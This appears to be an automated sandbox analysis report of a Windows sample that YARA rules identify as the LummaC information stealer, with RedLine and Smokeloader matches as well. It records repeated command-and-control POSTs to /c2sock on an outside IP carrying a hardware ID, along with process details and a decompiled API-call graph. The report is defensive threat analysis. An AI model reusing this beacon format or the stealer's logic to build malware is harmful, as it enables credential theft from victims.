                                                          Nov 13, 2024 10:53:20.844418049 CET2472OUTData Raw: eb f9 42 ea 21 b9 ff 5d 28 fe 27 fe 97 3d ae 99 7e d2 ff 5b bf 15 8a ff 49 ff af f8 9f f8 9f f8 9f f8 9f f4 ff 4a ff af f4 ff 8a ff 89 ff 35 b6 ff 37 6d ff 47 de da 3f b3 07 18 a6 e7 da fd 51 6f ff af 6d de 1f 9f 07 38 e5 a8 3e 3a bc 3e 90 ef fb
                                                          Data Ascii: B!]('=~[IJ57mG?Qom8>:>HZO'C/~9tS~Hv~5x]:Bb8.`EXwi^a3~s&sj5E
                                                          Nov 13, 2024 10:53:20.848722935 CET2472OUTData Raw: ff 78 7f 30 6c b0 21 fe 37 eb 3c 75 b1 67 7c 7f 59 a8 ac 35 80 f4 ba 64 ed a6 dc fe f7 e8 55 c7 a9 27 cf df 43 2d 99 79 47 5b cc ff c3 33 92 fc 2f ed e7 5d 1a fa df 3a 23 be fd 51 bd 1f b7 bd 17 47 7c 5c 2d be ff 54 6d 82 3c 74 8e ae f1 7b 17 dc
                                                          Data Ascii: x0l!7<ug|Y5dU'C-yG[3/]:#QG|\-Tm<t{D;]wx_Vl57_M3=sVKu]`r?`^a>O}yObtNbCPG@8!@} igy3@_ku~
                                                          Nov 13, 2024 10:53:20.848831892 CET2472OUTData Raw: d4 75 81 ac ef d7 ec 03 d6 b5 80 9e f1 a1 ae 0f 7b 3f e0 79 13 0f d9 c2 da ef 6b ee 03 e1 81 0d 86 3b 45 d8 6e 0f ee 7f 30 41 7a a5 39 80 38 36 fd 0f 7e 07 fb e3 bb 3d f8 39 de 03 cc 3d 10 75 7e 38 cf 8d 10 cf e0 4e 68 f6 09 f3 7d bf e6 fc 3f 72
                                                          Data Ascii: u{?yk;En0Az986~=9=u~8Nh}?r>@mi)]56@6kZ\}WOE=j'b)jk/v]?OlVSc=]gmL'''X??V
                                                          Nov 13, 2024 10:53:20.849044085 CET2472OUTData Raw: fb 43 6c e7 c4 ff b2 fb 5f 96 fa 41 b3 3e 50 fc 4f fc 4f fc 2f dd fe c4 ff c4 ff c4 ff c4 ff 7a ba ff e5 de 03 d2 52 ff 2b 35 ce ff 7e 51 f2 d3 01 fe 37 cb 52 07 d8 53 fc 0f 75 83 f1 04 be 67 f1 3f 6e 80 ad f4 3f bd ff d7 b0 3e 7e 3c f5 b8 72 6a
                                                          Data Ascii: Cl_A>POO/zR+5~Q7RSug?n?>~<rjab0{Q-oh?|'%/bz.K?^k"<~a05|=t`u~BGh. 9#C/\0e~? ?79^ DKzC


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.64999194.158.244.69802052C:\Users\user\Desktop\Vd3tOP5WSD.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:53:29.596995115 CET188OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 440
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:53:29.597378969 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.64999394.158.244.69802052C:\Users\user\Desktop\Vd3tOP5WSD.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:53:38.534646988 CET188OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 440
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:53:38.535351038 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.64999494.158.244.69802052C:\Users\user\Desktop\Vd3tOP5WSD.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:53:47.416708946 CET188OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 440
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:53:47.417144060 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"3--SqDe87817huf871793q74Content-Disposition: form-data;


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.64999594.158.244.69802052C:\Users\user\Desktop\Vd3tOP5WSD.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:53:56.518299103 CET188OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 440
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:53:56.518840075 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.64999694.158.244.69802052C:\Users\user\Desktop\Vd3tOP5WSD.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:54:05.349737883 CET188OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 440
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:54:05.350265980 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.64999794.158.244.69802052C:\Users\user\Desktop\Vd3tOP5WSD.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:54:14.127818108 CET188OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 440
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:54:14.128194094 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:04:51:28
                                                          Start date:13/11/2024
                                                          Path:C:\Users\user\Desktop\Vd3tOP5WSD.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Vd3tOP5WSD.exe"
                                                          Imagebase:0x400000
                                                          File size:476'160 bytes
                                                          MD5 hash:D539E0FD4638F335E6BA827C71103E03
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3920154401.0000000000A38000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.2148951176.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:04:54:22
                                                          Start date:13/11/2024
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2052 -s 1564
                                                          Imagebase:0xd30000
                                                          File size:483'680 bytes
                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:4.2%
                                                            Dynamic/Decrypted Code Coverage:10.3%
                                                            Signature Coverage:52.3%
                                                            Total number of Nodes:776
                                                            Total number of Limit Nodes:24
                                                            execution_graph 73098 4102d1 73101 447a80 73098->73101 73104 44e224 73101->73104 73105 4102da 73104->73105 73106 44e22f RtlFreeHeap 73104->73106 73106->73105 73107 44e244 GetLastError 73106->73107 73108 44e251 __dosmaperr 73107->73108 73110 4447a4 14 API calls __dosmaperr 73108->73110 73110->73105 73111 4069a1 73129 4069ba _unexpected 73111->73129 73114 40738c 73115 408a5a lstrcatW lstrcatW 73130 40e14e 73115->73130 73116 406aed lstrcatW lstrcatW 73116->73129 73117 407722 lstrcatW lstrcatW 73117->73129 73118 405aaa 178 API calls 73118->73129 73119 408a43 73150 404710 46 API calls 73119->73150 73127 40620b 166 API calls 73127->73129 73128 4360e1 15 API calls 73128->73129 73129->73114 73129->73115 73129->73116 73129->73117 73129->73118 73129->73119 73129->73127 73129->73128 73144 403ead 46 API calls _strlen 73129->73144 73145 4034bc 46 API calls 73129->73145 73146 403d1e 46 API calls 73129->73146 73147 40476b 99 API calls 73129->73147 73148 404710 46 API calls 73129->73148 73149 4034fd 101 API calls 73129->73149 73143 40e172 _unexpected 73130->73143 73131 408a85 73132 40e14e 155 API calls 73132->73143 73134 40b81c 43 API calls 73134->73143 73135 40f53e lstrcatW lstrcatW lstrcatW 73135->73143 73138 40e7bc lstrcatW 73142 40e14e 155 API calls 73138->73142 73139 40d994 155 API calls 73139->73143 73140 447a80 14 API calls ___std_exception_destroy 73140->73143 73141 40e54f lstrcatW lstrcatW 73141->73143 73142->73143 73143->73131 73143->73132 73143->73134 73143->73135 73143->73138 73143->73139 73143->73140 73143->73141 73151 40b129 73143->73151 73163 438e28 73143->73163 73171 419e6b 73143->73171 73144->73129 73145->73129 73146->73129 73147->73129 73148->73129 73149->73129 73150->73115 73160 40b13c _unexpected 73151->73160 73152 40b494 73153 40b759 NtReadFile 73155 438e28 3 API calls 73153->73155 73154 40b81c 41 API calls 73154->73160 73158 40b7ab NtClose 73155->73158 73156 40b129 41 API calls 73156->73160 73157 438e28 LoadLibraryW GetPEB lstrcmpiW 73157->73160 73158->73143 73160->73152 73160->73153 73160->73154 73160->73156 73160->73157 73161 40a928 41 API calls 73160->73161 73162 447e24 15 API calls ___std_exception_copy 73160->73162 73179 40b7bb 73160->73179 73161->73160 73162->73160 73167 438e45 73163->73167 73164 439136 73164->73143 73165 43935b LoadLibraryW 73165->73167 73166 439535 GetPEB lstrcmpiW 73166->73167 73167->73164 73167->73165 73167->73166 73168 43b362 GetPEB lstrcmpiW 73167->73168 73169 43a4fe GetPEB lstrcmpiW 73167->73169 73170 438e28 GetPEB lstrcmpiW 73167->73170 73168->73167 73169->73167 73170->73167 73177 419e88 73171->73177 73173 41a1d4 73173->73143 73177->73173 73235 418b8f 73177->73235 73238 41831a 119 API calls _wctomb_s 73177->73238 73239 419496 106 API calls 3 library calls 73177->73239 73240 4137c1 16 API calls 2 library calls 73177->73240 73241 41900a 46 API calls 2 library calls 73177->73241 73185 40a928 73179->73185 73181 40b812 73181->73160 73182 40b7ca 73182->73181 73182->73182 73183 438e28 3 API calls 73182->73183 73184 40b807 NtClose 73183->73184 73184->73181 73186 40a941 _unexpected 73185->73186 73187 438e28 3 API calls 73186->73187 73197 40a956 _unexpected 73187->73197 73188 40b02e lstrcatW lstrlenW 73188->73197 73189 40af6b NtCreateFile 73194 438e28 3 API calls 73189->73194 73190 40ac51 lstrlenW 73190->73197 73191 40acba lstrcatW 73191->73197 73192 438e28 3 API calls 73192->73197 73194->73197 73195 40b129 38 API calls 73195->73197 73196 40ae4c 73196->73182 73197->73188 73197->73189 73197->73190 73197->73191 73197->73192 73197->73195 73197->73196 73198 40a928 38 API calls 73197->73198 73199 40b7bb 38 API calls 73197->73199 73200 40b81c 73197->73200 73198->73197 73199->73197 73225 40b835 __fread_nolock _unexpected 73200->73225 73201 40d6a1 lstrcmpW 73201->73225 73202 40d7fe lstrlenW 73202->73225 73203 40d817 lstrlenW 73203->73225 73204 40d3c0 lstrcmpW 73204->73225 73205 40d891 lstrcmpW 73205->73225 73206 40d352 73206->73197 73207 40d120 NtQueryDirectoryFile 73207->73225 73208 40c3a9 lstrcmpW 73208->73225 73209 40c57e lstrlenW 73209->73225 73210 438e28 3 API calls 73216 40d547 NtClose 73210->73216 73211 40cc06 lstrcatW lstrcatW 73211->73225 73212 40c8cc lstrcmpW 73212->73225 73213 40c8fe lstrlenW 73213->73225 73214 40cdde lstrcatW 73214->73225 73215 438e28 3 API calls 73219 40cced NtCreateFile 73215->73219 73216->73225 73217 40b81c 26 API calls 73217->73225 73219->73225 73220 40c415 lstrcatW lstrcatW 73220->73225 73221 438e28 LoadLibraryW GetPEB lstrcmpiW 73221->73225 73222 40b129 26 API calls 73222->73225 73223 40a928 26 API calls 73223->73225 73224 40b7bb 26 API calls 73224->73225 73225->73201 73225->73202 73225->73203 73225->73204 73225->73205 73225->73206 73225->73207 73225->73208 73225->73209 73225->73210 73225->73211 73225->73212 73225->73213 73225->73214 73225->73215 73225->73217 73225->73220 73225->73221 73225->73222 73225->73223 73225->73224 73226 447e24 73225->73226 73232 44eb6f __dosmaperr 73226->73232 73227 44ebad 73234 4447a4 14 API calls __dosmaperr 73227->73234 73228 44eb98 RtlAllocateHeap 73230 44ebab 73228->73230 73228->73232 73230->73225 73232->73227 73232->73228 73233 44e560 EnterCriticalSection LeaveCriticalSection __dosmaperr 73232->73233 73233->73232 73234->73230 73242 418ba2 73235->73242 73237 418b9e 73237->73177 73238->73177 73239->73177 73240->73177 73241->73177 73243 418bb9 _strlen 73242->73243 73250 418c73 73242->73250 73244 447a80 ___std_exception_destroy 14 API calls 73243->73244 73245 418bfe 73243->73245 73243->73250 73244->73245 73246 418c33 73245->73246 73249 418cf3 73245->73249 73245->73250 73254 418c68 73246->73254 73260 415039 46 API calls 73246->73260 73248 447a80 ___std_exception_destroy 14 API calls 73248->73250 73249->73254 73255 44614f GetSystemTimeAsFileTime 73249->73255 73250->73237 73252 418e08 73257 417099 73252->73257 73254->73248 73254->73250 73256 446188 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 73255->73256 73256->73252 73261 44575f 73257->73261 73259 4170be 73259->73254 73260->73254 73262 44576a 73261->73262 73263 44578d 73262->73263 73264 44577a 73262->73264 73266 4457b2 73263->73266 73267 44579f 73263->73267 73307 4447a4 14 API calls __dosmaperr 73264->73307 73270 4457d2 73266->73270 73271 4457e3 73266->73271 73309 4447a4 14 API calls __dosmaperr 73267->73309 73268 44577f 73308 44e2f7 29 API calls __wsopen_s 73268->73308 73311 4447a4 14 API calls __dosmaperr 73270->73311 73299 453aae 73271->73299 73273 4457a4 73310 44e2f7 29 API calls __wsopen_s 73273->73310 73279 4457fa 73280 4459ee 73279->73280 73319 45373d 73279->73319 73338 44e307 11 API calls _unexpected 73280->73338 73283 44580c 73283->73280 73326 453769 73283->73326 73284 4459f8 73286 44581e 73286->73280 73287 445827 73286->73287 73288 4458ac 73287->73288 73290 445848 73287->73290 73336 4537d0 29 API calls 3 library calls 73288->73336 73333 4537d0 29 API calls 3 library calls 73290->73333 73291 4458b3 73298 445789 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 73291->73298 73337 453a5a 29 API calls 2 library calls 73291->73337 73293 445860 73293->73298 73334 453a5a 29 API calls 2 library calls 73293->73334 73296 445879 73296->73298 73335 4537d0 29 API calls 3 library calls 73296->73335 73298->73259 73300 453aba ___scrt_is_nonwritable_in_current_image 73299->73300 73301 4457e8 73300->73301 73339 44d13d EnterCriticalSection 73300->73339 73312 453711 73301->73312 73303 453acb 73304 453adf 73303->73304 73340 453ff7 73303->73340 73352 453b02 LeaveCriticalSection _unexpected 73304->73352 73307->73268 73308->73298 73309->73273 73310->73298 73311->73298 73313 453732 73312->73313 73314 45371d 73312->73314 73313->73279 73415 4447a4 14 API calls __dosmaperr 73314->73415 73316 453722 73416 44e2f7 29 API calls __wsopen_s 73316->73416 73318 45372d 73318->73279 73320 45375e 73319->73320 73321 453749 73319->73321 73320->73283 73417 4447a4 14 API calls __dosmaperr 73321->73417 73323 45374e 73418 44e2f7 29 API calls __wsopen_s 73323->73418 73325 453759 73325->73283 73327 453775 73326->73327 73328 45378a 73326->73328 73419 4447a4 14 API calls __dosmaperr 73327->73419 73328->73286 73330 45377a 73420 44e2f7 29 API calls __wsopen_s 73330->73420 73332 453785 73332->73286 73333->73293 73334->73296 73335->73298 73336->73291 73337->73298 73338->73284 73339->73303 73353 453b0b 73340->73353 73343 454053 73371 453bc4 73343->73371 73344 45404a 73365 453d65 73344->73365 73347 454050 73348 44e224 __freea 14 API calls 73347->73348 73349 45405e 73348->73349 73394 43d298 5 API calls ___raise_securityfailure 73349->73394 73351 45406b 73351->73304 73352->73301 73395 45af54 73353->73395 73358 453b52 73360 44e224 __freea 14 API calls 73358->73360 73359 45af54 42 API calls 73361 453b6a 73359->73361 73362 453b31 73360->73362 73361->73358 73363 453b74 73361->73363 73362->73343 73362->73344 73364 44e224 __freea 14 API calls 73363->73364 73364->73362 73366 453d75 73365->73366 73367 453769 29 API calls 73366->73367 73368 453d96 73367->73368 73410 44e307 11 API calls _unexpected 73368->73410 73370 453ff6 73372 453bd4 73371->73372 73373 453769 29 API calls 73372->73373 73374 453bf1 73373->73374 73375 453d13 73374->73375 73377 453711 29 API calls 73374->73377 73414 44e307 11 API calls _unexpected 73375->73414 73379 453c03 73377->73379 73378 453d1d 73379->73375 73380 45373d 29 API calls 73379->73380 73381 453c15 73380->73381 73381->73375 73382 453c1e 73381->73382 73383 44e224 __freea 14 API calls 73382->73383 73384 453c29 GetTimeZoneInformation 73383->73384 73385 453c45 73384->73385 73386 453cf0 73384->73386 73387 453c79 __fread_nolock 73385->73387 73386->73347 73411 4512d8 41 API calls 2 library calls 73387->73411 73389 453cc8 73412 453b82 43 API calls 3 library calls 73389->73412 73391 453cd9 73413 453b82 43 API calls 3 library calls 73391->73413 73393 453ced 73393->73386 73394->73351 73396 45af5f ___scrt_is_nonwritable_in_current_image 73395->73396 73397 44d13d _unexpected EnterCriticalSection 73396->73397 73398 45af76 73397->73398 73399 45b042 42 API calls 73398->73399 73400 45af8c 73399->73400 73401 45afb5 LeaveCriticalSection 73400->73401 73402 453b2a 73401->73402 73402->73362 73403 44eb6f 73402->73403 73404 44ebad 73403->73404 73408 44eb7d __dosmaperr 73403->73408 73406 4447a4 __dosmaperr 14 API calls 73404->73406 73405 44eb98 RtlAllocateHeap 73407 44ebab 73405->73407 73405->73408 73406->73407 73407->73358 73407->73359 73408->73404 73408->73405 73409 44e560 __dosmaperr EnterCriticalSection LeaveCriticalSection 73408->73409 73409->73408 73410->73370 73411->73389 73412->73391 73413->73393 73414->73378 73415->73316 73416->73318 73417->73323 73418->73325 73419->73330 73420->73332 73421 43c910 73422 43c91c ___scrt_is_nonwritable_in_current_image 73421->73422 73447 43cbbb 73422->73447 73424 43c923 73425 43ca76 73424->73425 73429 43c94d ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 73424->73429 73470 43ce95 4 API calls 2 library calls 73425->73470 73427 43ca7d 73463 443854 73427->73463 73433 43c96c 73429->73433 73434 43c9ed 73429->73434 73466 44389e 41 API calls 3 library calls 73429->73466 73432 43ca8b 73455 43ce0e GetStartupInfoW __fread_nolock 73434->73455 73436 43c9f3 73456 42f1a8 73436->73456 73441 43ca0f 73441->73427 73442 43ca13 73441->73442 73443 43ca1c 73442->73443 73468 443880 23 API calls _unexpected 73442->73468 73469 43cbf4 77 API calls ___scrt_uninitialize_crt 73443->73469 73446 43ca24 73446->73433 73448 43cbc4 73447->73448 73472 43d0b8 IsProcessorFeaturePresent 73448->73472 73450 43cbd0 73473 43d5c2 10 API calls 2 library calls 73450->73473 73452 43cbd5 73453 43cbd9 73452->73453 73474 43d5e1 7 API calls 2 library calls 73452->73474 73453->73424 73455->73436 73457 42f1ad 73456->73457 73475 422177 73457->73475 73483 4245ec 73457->73483 73492 4244e4 GetPEB 73457->73492 73496 42d658 73457->73496 73458 42f1bd 73467 43ce3f GetModuleHandleW 73458->73467 73884 443a0a 73463->73884 73466->73434 73467->73441 73468->73443 73469->73446 73470->73427 73471 44386a 23 API calls _unexpected 73471->73432 73472->73450 73473->73452 73474->73453 73477 422191 73475->73477 73476 422398 NtQueryInformationProcess 73476->73477 73477->73476 73478 42245b GetPEB 73477->73478 73481 422491 73477->73481 73521 41f916 GetPEB VirtualQuery 73477->73521 73522 4279e0 73477->73522 73526 41ebeb 58 API calls 73477->73526 73478->73477 73481->73458 73487 424605 73483->73487 73484 4247ff NtQuerySystemInformation 73484->73487 73485 4247b0 GetPEB 73485->73487 73487->73484 73487->73485 73488 4279e0 GetPEB 73487->73488 73489 424980 73487->73489 73490 4224a3 GetPEB NtQueryInformationProcess GetPEB 73487->73490 73491 422177 56 API calls 73487->73491 73528 4262a1 73487->73528 73488->73487 73489->73458 73490->73487 73491->73487 73493 424502 73492->73493 73494 4279e0 GetPEB 73493->73494 73495 4245d2 NtSetInformationThread 73493->73495 73494->73493 73495->73458 73497 42d66d 73496->73497 73498 4360e1 15 API calls 73497->73498 73499 422177 58 API calls 73497->73499 73500 42f19d 73497->73500 73503 419b9d 72 API calls 73497->73503 73504 4244e4 3 API calls 73497->73504 73506 4269e4 GetPEB GetPEB 73497->73506 73508 42d658 281 API calls 73497->73508 73509 41a28f 182 API calls 73497->73509 73510 4262a1 58 API calls 73497->73510 73511 42f265 GetPEB 73497->73511 73513 4245ec 58 API calls 73497->73513 73515 40e14e 161 API calls 73497->73515 73516 42f1c2 GetPEB NtClose GetPEB 73497->73516 73613 402fcc LoadLibraryA LoadLibraryA 73497->73613 73623 401ff9 73497->73623 73634 402476 73497->73634 73647 430228 73497->73647 73660 436adc 73497->73660 73677 434080 73497->73677 73693 433c10 73497->73693 73703 421eeb 73497->73703 73709 4224a3 73497->73709 73715 42cfba 73497->73715 73498->73497 73499->73497 73500->73458 73503->73497 73504->73497 73506->73497 73508->73497 73509->73497 73510->73497 73511->73497 73513->73497 73515->73497 73516->73497 73521->73477 73523 4279fe 73522->73523 73524 428317 73523->73524 73527 428334 GetPEB 73523->73527 73524->73477 73526->73477 73527->73523 73542 4262bc __fread_nolock 73528->73542 73529 426847 RtlAdjustPrivilege 73534 4279e0 GetPEB 73529->73534 73530 426972 73539 422177 55 API calls 73530->73539 73530->73542 73585 424c44 GetModuleFileNameW CreateFileW CloseHandle 73530->73585 73532 4279e0 GetPEB 73532->73542 73533 426600 GetPEB 73533->73542 73534->73542 73535 4269dc 73535->73487 73537 4263c1 LoadLibraryA 73537->73542 73539->73530 73540 422817 17 API calls 73540->73542 73542->73529 73542->73530 73542->73532 73542->73533 73542->73535 73542->73537 73542->73540 73543 4244e4 3 API calls 73542->73543 73545 41f9a4 73542->73545 73582 41eb3f RaiseException 73542->73582 73583 424995 20 API calls 2 library calls 73542->73583 73584 426a42 GetPEB GetPEB 73542->73584 73543->73542 73576 41f9bc 73545->73576 73546 42162a GetProcessId 73546->73576 73547 421bb3 NtQuerySystemInformation 73547->73576 73548 421bff NtQuerySystemInformation 73548->73576 73550 422817 17 API calls 73550->73576 73551 4262a1 51 API calls 73551->73576 73552 424b24 GetPEB HeapDestroy 73552->73576 73554 420e2d NtClose 73554->73576 73555 4228cf 51 API calls 73555->73576 73556 4245ec 51 API calls 73556->73576 73557 421ee3 73557->73542 73559 4202ad GetCurrentProcessId 73559->73576 73560 447a80 ___std_exception_destroy 14 API calls 73560->73576 73561 420593 NtDuplicateObject 73561->73576 73563 447e24 ___std_exception_copy 15 API calls 73563->73576 73564 4269e4 GetPEB GetPEB 73564->73576 73565 41f916 GetPEB VirtualQuery 73565->73576 73566 420a7a GetPEB 73566->73576 73568 422177 51 API calls 73568->73576 73570 41f536 51 API calls 73570->73576 73571 421eeb NtQueryInformationProcess GetPEB GetPEB 73571->73576 73572 4279e0 GetPEB 73572->73576 73573 426a42 GetPEB GetPEB 73573->73576 73575 420bb6 73575->73576 73601 424c44 GetModuleFileNameW CreateFileW CloseHandle 73575->73601 73602 424bed GetPEB GetModuleFileNameW CreateFileW CloseHandle 73575->73602 73603 4228cf 73575->73603 73576->73546 73576->73547 73576->73548 73576->73550 73576->73551 73576->73552 73576->73554 73576->73555 73576->73556 73576->73557 73576->73559 73576->73560 73576->73561 73576->73563 73576->73564 73576->73565 73576->73566 73576->73568 73576->73570 73576->73571 73576->73572 73576->73573 73576->73575 73577 4244e4 3 API calls 73576->73577 73579 4224a3 GetPEB NtQueryInformationProcess GetPEB 73576->73579 73580 41f9a4 51 API calls 73576->73580 73581 424995 20 API calls 73576->73581 73586 44814e 73576->73586 73599 424c8d 58 API calls ___std_exception_copy 73576->73599 73600 41eb3f RaiseException 73576->73600 73608 41ebeb 58 API calls 73576->73608 73609 41e6f0 58 API calls 73576->73609 73577->73576 73579->73576 73580->73576 73581->73576 73582->73542 73583->73542 73585->73530 73587 45699f 73586->73587 73588 4569b7 73587->73588 73589 4569ac 73587->73589 73591 4569bf 73588->73591 73597 4569c8 __dosmaperr 73588->73597 73590 44eb6f __fread_nolock 15 API calls 73589->73590 73596 4569b4 73590->73596 73594 44e224 __freea 14 API calls 73591->73594 73592 4569f2 RtlReAllocateHeap 73592->73596 73592->73597 73593 4569cd 73610 4447a4 14 API calls __dosmaperr 73593->73610 73594->73596 73596->73576 73597->73592 73597->73593 73611 44e560 EnterCriticalSection LeaveCriticalSection __dosmaperr 73597->73611 73599->73576 73600->73576 73601->73575 73602->73575 73604 422958 73603->73604 73612 424995 20 API calls 2 library calls 73604->73612 73606 4244a9 73607 4262a1 58 API calls 73606->73607 73607->73606 73608->73576 